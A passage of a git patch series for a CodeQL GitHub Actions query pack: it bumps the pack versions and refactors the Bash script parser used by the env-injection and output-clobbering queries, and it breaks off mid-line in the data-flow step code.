changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index af477fb9bf7..9637b993118 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.61 +version: 0.1.62 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b8b9ef321c..6548292a677 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.61 +version: 0.1.62 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7d2cbc1f50bd1121a0a0ec88ec955d8b35a9f708 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:13:27 +0200 Subject: [PATCH 0564/1267] Improve Bash script parser --- ql/lib/codeql/actions/Ast.qll | 18 + ql/lib/codeql/actions/Helper.qll | 508 ++++++++---------- ql/lib/codeql/actions/ast/internal/Ast.qll | 194 ++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 58 +- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 11 +- .../security/OutputClobberingQuery.qll | 34 +- .../actions/security/PoisonableSteps.qll | 9 +- ql/test/library-tests/commands.expected | 32 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.ql | 12 +- 11 files changed, 492 insertions(+), 394 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a4c50ecf55b..759bcf3f786 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -294,9 +294,27 @@ class Run extends Step instanceof RunImpl { string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + string getACommand() { result = super.getACommand() } + predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + + predicate getAWriteToGitHubEnv(string name, string value) { + super.getAWriteToGitHubEnv(name, value) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + super.getAWriteToGitHubOutput(name, value) + } + + predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index d6e3042ead3..8391463fd20 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -24,219 +24,6 @@ string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -/** Checks if expr is a bash parameter expansion */ -bindingset[expr] -predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) -} - -bindingset[raw_content] -predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) -} - -bindingset[script] -predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) -} - -bindingset[script] -predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) -} - -bindingset[script] -predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) -} - -bindingset[script] -predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content - //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) -} - -bindingset[script] -predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) -} - -bindingset[script] -predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) -} - -bindingset[script, file_var] -predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) -} - -predicate writeToGitHubEnv(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_ENV", content) -} - -predicate writeToGitHubOutput(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) -} - -predicate writeToGitHubPath(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_PATH", content) -} - -/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ -bindingset[script, file_var] -predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) -} - -predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) -} - -predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) -} - -predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) -} - predicate inPrivilegedContext(AstNode node, Event event) { node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } @@ -245,16 +32,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -bindingset[snippet] -predicate outputsPartialFileContent(string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 -} - string defaultBranchNames() { repositoryDataModel(_, result) or @@ -321,80 +98,225 @@ module Bash { string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - bindingset[script] - string getACommand(string script) { - exists(string stmt_, string stmt, string subline2, string cmd | - stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and - stmt = - [ - // $() command substitution - stmt_ - .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", ""), - // `...` command substitution - stmt_ - .regexpFind("\\`[^\\`]+\\`", _, _) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", ""), - // original line with no substitutions - stmt_ - .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") - .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") - ] and - // We shoulg replace quoted arguments with a placeholder to avoid splitting them - // eg: ls | grep -E "*.(tar.gz|zip)$" - //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and - ( - stmt.regexpMatch(".*\"([^\"]+)\".*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), - stmt.regexpFind("\"([^\"]+)\"", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) - or - stmt.regexpMatch(".*'([^']+)'.*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), - stmt.regexpFind("'([^']+)'", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) - or - not stmt.regexpMatch(".*'([^']+)'.*") and - not stmt.regexpMatch(".*\"([^\"]+)\".*") and - subline2 = stmt - ) and - cmd = subline2.splitAt(splitSeparators()).trim() and - // when splitting the line with a separator that is not found, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not cmd.indexOf(splitSeparators()) > -1 and - not cmd = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", - "case", "esac", "{", "}" - ] and - result = - cmd.replaceAll("::PIPE::", "|") - .replaceAll("::SEMICOLON::", ";") - .replaceAll("::AND::", "&&") - .replaceAll("::OR::", "||") + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) ) } bindingset[script] - predicate getAnAssignment(string script, string name, string value) { - exists(string stmt | - stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + + // "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + + // ")\n" + + "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + bindingset[script, file_var] + predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) + } + + predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) + } + + predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) + } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.matches("%" + snippet + "%") and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 ) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5b96781a10b..30b57e361ab 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,12 +1319,6 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - string getACommand() { result = Bash::getACommand(this.getScript()) } - - predicate getAnAssignment(string name, string value) { - Bash::getAnAssignment(this.getScript(), name, value) - } - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } @@ -1344,6 +1338,194 @@ class RunImpl extends StepImpl { .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") else result = "GITHUB_WORKSPACE/" } + + private string lineProducer(int i) { + result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparators()) > -1 + } + + private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredQuotedStringLineProducer(int i) { + result = + max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + } + + private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getStmt(int i) { + result = + max(int round, string new | + this.doRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getAStmt() { result = this.getStmt(_) } + + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + + string getCommand(int i) { + result = this.getStmt(i) and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + + predicate getAWriteToGitHubEnv(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubPath(string value) { + Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4b8cff4f428..f43d1bdcd87 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,20 +82,17 @@ predicate envToArgInjSink(string var_name, Run run, string command) { */ bindingset[var_name] predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string content, string value | + exists(string value | ( file = "GITHUB_ENV" and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) or file = "GITHUB_OUTPUT" and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubOutput(key, value) or file = "GITHUB_PATH" and - writeToGitHubPath(run, content) and - key = "path" and - value = content + run.getAWriteToGitHubPath(value) and + key = "path" ) and envToRunExpr(var_name, run, value) ) @@ -144,14 +141,13 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and + exists(Run run, string var_name, string key, string value | + run.getAWriteToGitHubEnv(key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - isBashParameterExpansion(value, var_name, _, _) + Bash::isBashParameterExpansion(value, var_name, _, _) ) } @@ -178,29 +174,24 @@ predicate controlledCWD(Step artifact) { * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string content, string key, string value | + exists(Run run, Step artifact, string key, string value | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, Step artifact | + exists(Run run, string 